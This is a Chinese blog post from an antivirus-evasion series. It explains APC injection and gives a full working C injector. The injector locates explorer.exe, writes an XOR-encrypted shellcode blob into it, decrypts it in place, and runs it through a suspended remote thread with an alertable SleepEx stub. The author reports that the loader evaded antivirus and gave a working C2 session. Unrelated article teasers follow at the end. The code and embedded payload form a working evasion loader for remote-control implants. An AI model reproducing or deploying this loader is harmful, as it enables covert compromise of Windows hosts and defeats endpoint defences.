【免殺】C2免殺技術(八)APC注入

本文主要寫點自己的理解,如有問題,請諸位指出!

概念和流程

“APC注入”(APC Injection)是免殺與惡意代碼注入技術中的一種典型方法,主要用于在目標進程中遠程執行代碼,常見于后門、遠控、植入型木馬等攻擊場景。該技術的核心在于利用 Windows 的 APC(Asynchronous Procedure Call,異步過程調用)機制,將惡意代碼注入到其他線程中執行,尤其是掛起狀態或等待狀態的線程。

APC機制等基本知識,可自行了解。

Windows系統中的APC機制允許將一個函數排入線程的APC隊列中。當線程進入“警報可接收狀態(Alertable State)”時,例如調用 SleepExWaitForSingleObjectEx 等帶 Ex 后綴的函數時,APC隊列中的函數就會被執行。這本質上是系統提供的一種線程內異步執行函數的機制。

我的理解:在C2免殺領域,APC注入就是“植入惡意回調隊列”。我把它分為三種形式:

1、采用自身線程:將惡意代碼函數排入APC隊列→觸發Alertable狀態

2、自建遠程線程:打開目標進程、自建線程、將惡意代碼的函數插入APC、構造Alertable環境

3、采用目標線程:目標進程寫入惡意代碼→獲取目標線程→將惡意代碼的函數插入APC→等待或觸發Alertable狀態→APC自動執行

步驟自身線程自建遠程線程目標線程(合法線程)
1. 找目標無(當前進程)查找目標進程查找目標進程與線程
2. 分配內存VirtualAllocVirtualAllocExVirtualAllocEx
3. 寫入Shellcode直接寫入WriteProcessMemoryWriteProcessMemory
4. APC排隊QueueUserAPCQueueUserAPCQueueUserAPC
5. 觸發執行SleepEx 等待APC自建遠程線程中 SleepEx強制目標線程 Alertable 狀態

免殺效果演示

這里采用第二種形式做演示:自建遠程線程!

因為我要用DF查殺的那個xor加載器做對比演示,本身APC結合xor就不是明智之舉,因此第一種“自身線程”的形式,單純結合xor等于沒加密,靜態掃描一查一個殺!第三種“目標線程”的形式倒是做出來對比效果了,但是穩定性極差,少數情況下實戰可能能用到,但是不適合做演示,說服力不足!

改造好的代碼

該注入器通過遠程分配內存與APC機制,把加密的shellcode寫入目標進程,再用自建“永遠Alertable”的線程自動觸發APC,達到繞過部分行為檢測的內存執行效果。

#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib")unsigned char enc_shellcode[] = "\x97\x3d\xed\x8f\x85\x86\xa3\x75\x6e\x6b\x34\x3f\x2a\x25\x3c\x3a\x23\x26\x5a\xa7\x0b\x23\xfe\x3c\x0b\x3d\xe5\x39\x6d\x26\xe0\x27\x4e\x23\xfe\x1c\x3b\x3d\x61\xdc\x3f\x24\x26\x44\xa7\x23\x44\xae\xc7\x49\x0f\x17\x77\x42\x4b\x34\xaf\xa2\x78\x2f\x6a\xb4\x8c\x86\x27\x2f\x3a\x3d\xe5\x39\x55\xe5\x29\x49\x26\x6a\xa5\x08\xea\x0d\x76\x60\x77\x1b\x19\xfe\xee\xe3\x75\x6e\x6b\x3d\xeb\xab\x01\x09\x23\x74\xbe\x3b\xfe\x26\x73\x31\xe5\x2b\x55\x27\x6a\xa5\x8d\x3d\x3d\x91\xa2\x34\xe5\x5f\xfd\x26\x6a\xa3\x23\x5a\xbc\x26\x5a\xb5\xc2\x2a\xb4\xa7\x66\x34\x6f\xaa\x4d\x8e\x1e\x84\x22\x68\x39\x4a\x63\x30\x57\xba\x00\xb6\x33\x31\xe5\x2b\x51\x27\x6a\xa5\x08\x2a\xfe\x62\x23\x31\xe5\x2b\x69\x27\x6a\xa5\x2f\xe0\x71\xe6\x23\x74\xbe\x2a\x2d\x2f\x33\x2b\x37\x31\x34\x36\x2a\x2c\x2f\x31\x3d\xed\x87\x55\x2f\x39\x8a\x8e\x33\x34\x37\x31\x3d\xe5\x79\x9c\x21\x94\x8a\x91\x36\x1f\x6e\x22\xcb\x19\x02\x1b\x07\x05\x10\x1a\x6b\x34\x38\x22\xfc\x88\x27\xfc\x9f\x2a\xcf\x22\x1c\x53\x69\x94\xa0\x26\x5a\xbc\x26\x5a\xa7\x23\x5a\xb5\x23\x5a\xbc\x2f\x3b\x34\x3e\x2a\xcf\x54\x3d\x0c\xc9\x94\xa0\x85\x18\x2f\x26\xe2\xb4\x2f\xd3\x28\x7f\x6b\x75\x23\x5a\xbc\x2f\x3a\x34\x3f\x01\x76\x2f\x3a\x34\xd4\x3c\xfc\xf1\xad\x8a\xbb\x80\x2c\x35\x23\xfc\xaf\x23\x44\xbc\x22\xfc\xb6\x26\x44\xa7\x39\x1d\x6e\x69\x35\xea\x39\x27\x2f\xd1\x9e\x3b\x45\x4e\x91\xbe\x3d\xe7\xad\x3d\xed\xa8\x25\x04\x61\x2a\x26\xe2\x84\x26\xe2\xaf\x27\xac\xb5\x91\x94\x8a\x91\x26\x44\xa7\x39\x27\x2f\xd1\x58\x68\x73\x0e\x91\xbe\xf0\xae\x64\xf0\xf3\x6a\x75\x6e\x23\x8a\xa1\x64\xf1\xe2\x6a\x75\x6e\x80\xa6\x87\x8f\x74\x6e\x6b\x9d\xcc\x94\x8a\x91\x44\x11\x5d\x0f\x17\x6e\x9e\xe1\x94\xb9\x9b\x78\x83\xcc\x97\xe4\x7a\xf1\xa8\x9c\x2f\x5e\x92\x2e\xa9\x05\xac\x3b\x1a\x80\xad\x7f\x9b\xdc\x1a\x02\xe9\xa4\x43\x22\x61\x1c\xd2\xfe\x99\xcc\xb0\x2d\x7c\x58\xf8\x57\xe2\x0f\x1c\x40\xba\xc6\x72\xaf\x70\xdb\x00\x10\x71\xe1\x7d\x09\x2b\x1e\x34\xc1\x39\x43\xe5\x5b\x11\x81\x79\x75\x3b\x18\x10\x1c\x46\x34\x09\x0e\x1b\x1a\x51\x55\x23\x04\x0f\x07\x07\x19\x0f\x44\x40\x40\x5b\x55\x46\x08\x1a\x03\x1b\x14\x1a\x02\x17\x02\x0e\x4e\x4e\x26\x26\x27\x2e\x55\x57\x45\x45\x55\x4b\x22\x07\x05\x11\x01\x1c\x06\x4e\x25\x21\x4e\x5d\x5b\x5f\x50\x55\x3a\x19\x1c\x0a\x0e\x1b\x1a\x44\x40\x40\x5b\x5c\x4e\x27\x37\x2c\x39\x3a\x39\x38\x30\x3c\x66\x7f\x6e\xb3\x68\x27\xa6\x09\x09\xbf\x40\x64\xa6\x7e\x01\x28\xcd\x43\x33\x14\xb8\x22\xe3\x86\xe1\xbc\x6e\xbd\x0d\xd3\xa5\x0b\x86\x8d\xa6\x62\x24\x96\xe4\xa7\x64\x15\x25\x41\x93\xe6\xd1\x9e\xb5\xf5\x4e\x21\xed\x79\x51\xa7\xca\xe1\x1d\xa0\x13\xd2\xd8\xbc\x33\x3c\x1b\xeb\x04\x92\xbe\x0c\xd2\xd2\x84\xc4\xa4\x94\x67\xc0\xe7\xf3\x48\x36\x8f\x79\x11\xcb\x7b\xd7\x3d\x37\x32\xe9\xfc\xb7\x6a\xe1\xac\x27\xac\xe5\x30\x26\xf0\x58\x37\x41\x25\x54\xa0\xdf\xdd\x65\x7f\xe4\xfb\x0e\xff\x25\x03\x9b\x8e\xfb\x98\xab\xca\xf0\x6a\xe2\x5b\xae\xcb\x61\xfa\xaa\x15\xdc\x51\xd6\x58\x7c\x1b\x64\x83\xd0\xa6\x89\xe9\x2c\xa6\xff\x40\x9e\x83\xd5\x03\x41\x1d\x9c\xee\x07\x67\x80\xf9\xa3\x3f\x24\x32\x31\x0d\x28\x5e\xff\xa2\xd5\x4b\x2a\xd7\xb1\x4d\xed\x97\x38\xcb\x72\xa3\x18\x86\x4f\x41\xb6\xf1\x07\x4f\x9a\x22\x8c\xea\xe8\x5b\x09\x7e\xff\x54\x48\xcb\x55\xf6\xd9\x0b\xef\x4e\xb2\xc2\xca\x02\xe3\x6e\x2a\xcb\x9e\xde\xd7\x38\x94\xa0\x26\x5a\xbc\xd4\x6b\x75\x2e\x6b\x34\xd6\x6b\x65\x6e\x6b\x34\xd7\x2b\x75\x6e\x6b\x34\xd4\x33\xd1\x3d\x8e\x8a\xbb\x23\xe6\x3d\x38\x3d\xe7\x8c\x3d\xe7\x9a\x3d\xe7\xb1\x34\xd6\x6b\x55\x6e\x6b\x3c\xe7\x92\x34\xd4\x79\xe3\xe7\x89\x8a\xbb\x23\xf6\xaa\x4b\xf0\xae\x1f\xc3\x08\xe0\x72\x26\x6a\xb6\xeb\xab\x00\xb9\x33\x2d\x36\x23\x70\x6e\x6b\x75\x6e\x3b\xb6\x86\xf4\x88\x91\x94\x44\x57\x59\x5b\x5f\x5d\x4d\x40\x5f\x4d\x40\x5a\x75\x6e\x61\x59\x44";
size_t shellcode_len = sizeof(enc_shellcode);const char xor_key[] = "kun";
size_t xor_key_len = sizeof(xor_key) - 1;// x64 SleepEx(INFINITE, TRUE) stub (占用18字節)
unsigned char sleepStub[] = {// mov ecx, 0xFFFFFFFF0xB9, 0xFF, 0xFF, 0xFF, 0xFF,// mov edx, 0x010xBA, 0x01, 0x00, 0x00, 0x00,// mov rax, SleepEx地址(后面動態填充)0x48, 0xB8, 0,0,0,0, 0,0,0,0,// call rax0xFF, 0xD0,// ret0xC3
};
size_t stub_len = sizeof(sleepStub);DWORD64 GetRemoteProcAddress(HANDLE hProcess, const wchar_t* dllName, const char* funcName) {HMODULE hMods[1024];DWORD cbNeeded;if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)) {for (unsigned int i = 0; i < (cbNeeded / sizeof(HMODULE)); i++) {wchar_t szModName[MAX_PATH];if (GetModuleBaseNameW(hProcess, hMods[i], szModName, sizeof(szModName) / sizeof(wchar_t))) {if (_wcsicmp(szModName, dllName) == 0) {HMODULE hLocal = GetModuleHandleW(dllName);FARPROC fLocal = GetProcAddress(hLocal, funcName);DWORD64 offset = (DWORD64)fLocal - (DWORD64)hLocal;return (DWORD64)hMods[i] + offset;}}}}return 0;
}// 自動查找 explorer.exe(或你指定的進程)
DWORD FindTargetProcess(LPCWSTR processName) {PROCESSENTRY32 pe = { 0 };pe.dwSize = sizeof(pe);HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hSnapshot == INVALID_HANDLE_VALUE) return 0;DWORD pid = 0;if (Process32First(hSnapshot, &pe)) {do {if (_wcsicmp(pe.szExeFile, processName) == 0) {pid = pe.th32ProcessID;break;}} while (Process32Next(hSnapshot, &pe));}CloseHandle(hSnapshot);return pid;
}int InjectAPCWithStub(DWORD pid) {HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);if (!hProcess) {printf("[-] OpenProcess failed\n");return -1;}// 查找遠程進程 kernel32!SleepEx 的地址DWORD64 sleepex_addr = GetRemoteProcAddress(hProcess, L"kernel32.dll", "SleepEx");if (!sleepex_addr) {printf("[-] 找不到遠程 SleepEx 地址\n");CloseHandle(hProcess);return -10;}// 填充 stub 里的 SleepEx 地址memcpy(sleepStub + 10, &sleepex_addr, sizeof(DWORD64));// 分配并寫入sleepStubLPVOID remoteStub = VirtualAllocEx(hProcess, NULL, stub_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (!remoteStub) {printf("[-] 分配線程stub失敗\n");CloseHandle(hProcess);return -2;}if (!WriteProcessMemory(hProcess, remoteStub, sleepStub, stub_len, NULL)) {printf("[-] 寫入線程stub失敗\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);CloseHandle(hProcess);return -3;}// 分配ShellcodeLPVOID remoteShell = VirtualAllocEx(hProcess, NULL, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!remoteShell) {printf("[-] 分配shellcode失敗\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);CloseHandle(hProcess);return -4;}// 寫入加密shellcodeif (!WriteProcessMemory(hProcess, remoteShell, enc_shellcode, shellcode_len, NULL)) {printf("[-] 寫入shellcode失敗\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hProcess);return -5;}// 解密for (size_t i = 0; i < shellcode_len; ++i) {unsigned char dec = enc_shellcode[i] ^ xor_key[i % xor_key_len];if (!WriteProcessMemory(hProcess, (LPVOID)((BYTE*)remoteShell + i), &dec, 1, NULL)) {printf("[-] 解密寫入失敗@%zu\n", i);VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hProcess);return -6;}}// 改為可執行DWORD oldProtect;VirtualProtectEx(hProcess, remoteShell, shellcode_len, PAGE_EXECUTE_READ, &oldProtect);// 新建線程,入口為我們的stubHANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteStub, NULL, CREATE_SUSPENDED, NULL);if (!hThread) {printf("[-] 新建遠程線程失敗\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hProcess);return -7;}// 投遞APCif (!QueueUserAPC((PAPCFUNC)remoteShell, hThread, NULL)) {printf("[-] APC掛載失敗\n");TerminateThread(hThread, 0);VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hThread);CloseHandle(hProcess);return -8;}// 喚醒線程,進入alertable,APC立即執行ResumeThread(hThread);printf("[+] APC注入并觸發完成,目標PID: %u\n", pid);// 收尾CloseHandle(hThread);CloseHandle(hProcess);return 0;
}int wmain() {LPCWSTR target = L"explorer.exe";DWORD pid = FindTargetProcess(target);if (!pid) {wprintf(L"[-] 未找到目標進程: %ls\n", target);return -1;}wprintf(L"[+] 目標進程: %ls (PID: %u)\n", target, pid);return InjectAPCWithStub(pid);
}

詳細分步流程

1、查找目標進程(如 explorer.exe)?

  • 用快照(CreateToolhelp32Snapshot)枚舉所有進程。

  • 找到名字符合的目標,取其PID。

  • 目的:選好要注入的宿主。

2、打開目標進程句柄

  • OpenProcess(PROCESS_ALL_ACCESS, ...)

  • 擁有后續操作(分配/寫入/創建線程)所需的權限。

3、查找目標進程 kernel32.dll 中 SleepEx 的地址

  • EnumProcessModules 找到 kernel32.dll 的遠程基址。

  • 用本地 GetProcAddress 拿到 SleepEx 的本地偏移量,再計算出遠程的實際地址。

  • 目的:讓后續線程Stub能在目標進程調用SleepEx(INFINITE, TRUE),進入Alertable狀態。

4、構造x64線程Stub(機器碼)

  • 匯編Stub的功能是:調用 SleepEx(INFINITE, TRUE) 并返回。

  • Stub里動態填入剛才算出來的遠程SleepEx地址。

  • 這樣保證新建線程一啟動就會一直處于Alertable狀態,APC機制一定能生效。

5、遠程分配兩塊內存

  • 一塊用于shellcode(加密后寫入,解密后設置可執行)。

  • 一塊用于Stub(設置為可執行)。

6、寫入shellcode,并進行遠程XOR解密

  • 先寫入加密的shellcode。

  • 然后逐字節寫解密后的值(每寫一字節,都XOR一次),規避靜態查殺與內存掃描。

  • 最后將內存保護改為 PAGE_EXECUTE_READ,供后續執行。

7、寫入線程Stub到目標進程并設置可執行

  • 讓新建線程以Stub為入口,保證其主循環是 SleepEx(INFINITE, TRUE)。

  • Stub自己什么都不干,只是保證APC可觸發。

8、新建遠程線程(掛起狀態),入口為Stub

  • CreateRemoteThread(..., CREATE_SUSPENDED) 新建線程,但不立刻運行。

  • 這樣你可以在正式Resume之前,完成所有APC和環境準備。

9、向該線程APC隊列排入你的Shellcode

  • QueueUserAPC((PAPCFUNC)remoteShellcode, hThread, NULL)

  • Shellcode會被插入到線程的APC隊列。

  • 這一步不是執行,只是“排隊”。

10、喚醒線程(ResumeThread),進入Alertable,APC自動執行Shellcode

  • 一Resume,Stub開始執行SleepEx(INFINITE, TRUE),線程狀態變Alertable。

  • 操作系統調度器發現有APC待執行,立即先調用Shellcode。

  • Shellcode代碼段就此“無聲上線”。

11、收尾、資源釋放

  • 關閉句柄、可選清理遠程內存。

  • 免除長久占用目標進程句柄等取證痕跡。

測試結果

編譯出來,放到DF下未被檢測,可以正常上線和執行命令,且隱藏進程!

后續可進一步改造和擴展! ?

結尾

免殺效果通常受多方面影響,沒有哪一種技術或者手段能夠通吃,通常需要多種手段結合才能最終實現免殺;其次,實戰中面臨的環境也不一樣,不同的殺軟效果也不一樣,具體問題還需具體分析。本系列文章以技術的實現為主,驗證時講究點到為止,以此表達一項技術的有效性。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/906530.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/906530.shtml
英文地址,請注明出處:http://en.pswp.cn/news/906530.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

git工具使用

安裝Git 在開始使用Git之前&#xff0c;需要在本地計算機上安裝Git工具。Git支持Windows、macOS和Linux系統。可以從Git官方網站下載適合操作系統的安裝包&#xff0c;并按照安裝向導進行安裝。 bash復制插入 # 在Linux上安裝Git sudo apt-get install git# 在macOS上安裝Git…

SpringBoot微服務編寫Dockerfile流程及問題匯總

背景 跟 Docker 磕了兩天&#xff0c;將一個包含 N 個微服務的應用部署包改造&#xff0c;使其能夠生成 Docker 鏡像&#xff0c;并在 Docker 容器中運行。幾年前玩過 Docker&#xff0c;隱約記得幾個命令「Dockerfile 命令&#xff1a;黑卡飲料、山楂果費、哦SUV&#xff0c;…

pytorch語法學習

啟動 python main.py --config llve.yml --path_y test -i output

基于LiveData和ViewModel的路線管理實現(帶PopupWindow刪除功能)

包含RecyclerView綁定、PopupWindow刪除功能和SharedPreferences持久化存儲。 1. RouteInfo類(實現Parcelable接口) java 復制 下載 import android.os.Parcel; import android.os.Parcelable;public class RouteInfo implements Parcelable {private Integer routeID;p…

jvm安全點(二)openjdk17 c++源碼垃圾回收安全點信號函數處理線程阻塞

1. 信號處理與樁代碼&#xff08;Stub&#xff09;?? 當線程訪問安全點輪詢頁&#xff08;Polling Page&#xff09;時&#xff1a; ??觸發 SIGSEGV 信號??&#xff1a;訪問只讀的輪詢頁會引發 SIGSEGV 異常。??信號處理函數??&#xff1a;pd_hotspot_signal_handl…

如何用數據可視化提升你的決策力?

在數字化浪潮席卷全球的當下&#xff0c;數據已然成為企業和組織發展的核心資產。然而&#xff0c;單純的數據堆積猶如未經雕琢的璞玉&#xff0c;難以直接為決策提供清晰有力的支持。數據可視化作為一種強大的工具&#xff0c;能夠將海量、復雜的數據轉化為直觀、易懂的圖形、…

VoiceFixer語音修復介紹與使用

一.簡介 VoiceFixer 是一款基于深度學習的通用語音修復工具&#xff0c;主要用于恢復嚴重退化的語音信號&#xff0c;支持降噪、消除回聲、提升音質等功能。 二.核心功能 1.語音修復與增強 VoiceFixer 采用端到端的神經網絡模型&#xff0c;能夠處理多種語音退化問題&#x…

Vue百日學習計劃Day19-20天詳細計劃-Gemini版

重要提示&#xff1a; 番茄時鐘&#xff1a; 每個番茄鐘為25分鐘學習&#xff0c;之后休息5分鐘。每完成4個番茄鐘&#xff0c;進行一次15-30分鐘的長休息。動手實踐&#xff1a; DevTools 的使用和 Git 命令的掌握都需要大量的實際操作。請務必邊學邊練。環境準備&#xff1a…

Qt初識.

認識 QLabel 類&#xff0c;能夠在界面上顯示字符串. 通過 setText 來設置的。參數 QString (Qt 中把 C 里的很多容器類&#xff0c;進行了重新封裝。歷史原因) 內存泄露 / 文件資源泄露對象樹. Qt 中通過對象樹&#xff0c;來統一的釋放界面的控件對象. Qt 還是推薦使用 new 的…

WebGPU 圖形計算

以下是關于 WebGPU 圖形計算的基本知識點總結: 一、WebGPU 核心定位與優勢 1. 與傳統技術對比 維度WebGLWebGPU架構設計OpenGL ES 封裝現代圖形API抽象(Vulkan/Metal/D3D12)多線程支持單線程渲染多線程并行計算計算能力有限通用計算完整計算管線支持資源控制隱式狀態管理顯…

視覺基礎模型

2.1 視覺的“大模型”時代&#xff1a;ViT的誕生與革新 在計算機視覺領域&#xff0c;卷積神經網絡&#xff08;CNN&#xff09;曾是當之無愧的霸主。從LeNet到ResNet&#xff0c;CNN在圖像分類、目標檢測等任務上取得了巨大成功。然而&#xff0c;隨著Transformer模型在自然語…

【React Native】快速入門

對于移動端應用來說&#xff0c;開發 Android 應用使用的語言有 java 和 kotlin&#xff0c;開發 ios 應用使用的語言有 obj-c 和 Swift 。因此&#xff0c;我們使用 react-native 編寫一套代碼進行跨端開發。 構建項目&#xff1a; npx create-expo-applatest安裝 nativewin…

AR 開啟昆蟲學習新視界,解鎖奇妙微觀宇宙

在傳統昆蟲學習中&#xff0c;課堂教學是主要方式&#xff0c;老師通過板書、PPT 傳授知識&#xff0c;但學生被動接受&#xff0c;書本靜態圖片無法展現昆蟲真實比例、立體形態&#xff0c;學生難以直觀感受復雜身體結構。博物館的昆蟲標本也是學習途徑&#xff0c;不過標本放…

BI 大屏是什么意思?具體應用在哪些方面?

目錄 一、BI 大屏的定義與內涵 1. 基本概念 2. 核心要素 3. 特點優勢 二、如何搭建高效的 BI 大屏 1. 明確需求與目標 2. 選擇合適的 BI大屏工具 3. 數據整合與清洗 4. 設計可視化界面 5. 持續優化與更新 三、BI 大屏在企業運營管理中的應用 1. 銷售與營銷領域 2.…

Kafka Go客戶端--Sarama

Kafka Go客戶端 在Go中里面有三個比較有名氣的Go客戶端。 Sarama:用戶數量最多&#xff0c;早期這個項目是在Shopify下面&#xff0c;現在挪到了IBM下。segmentio/kafka-go:沒啥大的缺點。confluent-kafka-go&#xff1a;需要啟用cgo,跨平臺問題比較多&#xff0c;交叉編譯也…

Axure全鏈路交互設計:快速提升實現能力(基礎交互+高級交互)

想讓你的設計稿像真實App一樣絲滑&#xff1f;本專欄帶你玩轉Axure交互&#xff0c;從選中高亮到動態面板騷操作&#xff0c;再到中繼器表單花式交互&#xff0c;全程動圖教學&#xff0c;一看就會&#xff01; 本專欄系統講解多個核心交互效果&#xff0c;是你的Axure交互急救…

自動化測試腳本點擊運行后,打開Chrome很久??

親愛的小伙伴們大家好。 小編最近剛換了電腦&#xff0c;這幾天做自動化測試發現打開Chrome瀏覽器需要等待好長時間&#xff0c;起初還以為代碼有問題&#xff0c;或者Chromedriver與Chrome不匹配造成的&#xff0c;但排查后發現并不是&#xff01;&#xff01; 在driver.py中…

現代人工智能系統的實用設計模式

關鍵要點 AI設計模式是為現代AI驅動的軟件中常見問題提供的可復用解決方案&#xff0c;幫助團隊避免重復造輪子。我們將其分為五類&#xff1a;提示與上下文&#xff08;Prompting & Context&#xff09;、負責任的AI&#xff08;Responsible AI&#xff09;、用戶體驗&…

經典面試題:TCP 三次握手、四次揮手詳解

在網絡通信的復雜架構里&#xff0c;“三次握手”與“四次揮手”仿若一座無形的橋梁&#xff0c;它們是連接客戶端與服務器的關鍵紐帶。這座“橋梁”不僅確保了連接的穩固建立&#xff0c;還保障了連接的有序結束&#xff0c;使得網絡世界中的信息能夠順暢、準確地流動。 在面…

食品飲料行業AI轉型趨勢分析與智能化解決方案探索?

一、行業洞察&#xff1a;AI驅動食品飲料行業價值重構? 當前&#xff0c;食品飲料行業正面臨消費分級顯性化、需求多元化與技術范式革新的三重挑戰。根據《2024食品飲料行業全營銷白皮書》&#xff0c;高收入群體傾向于高端化、個性化產品&#xff0c;而下沉市場更關注性價比…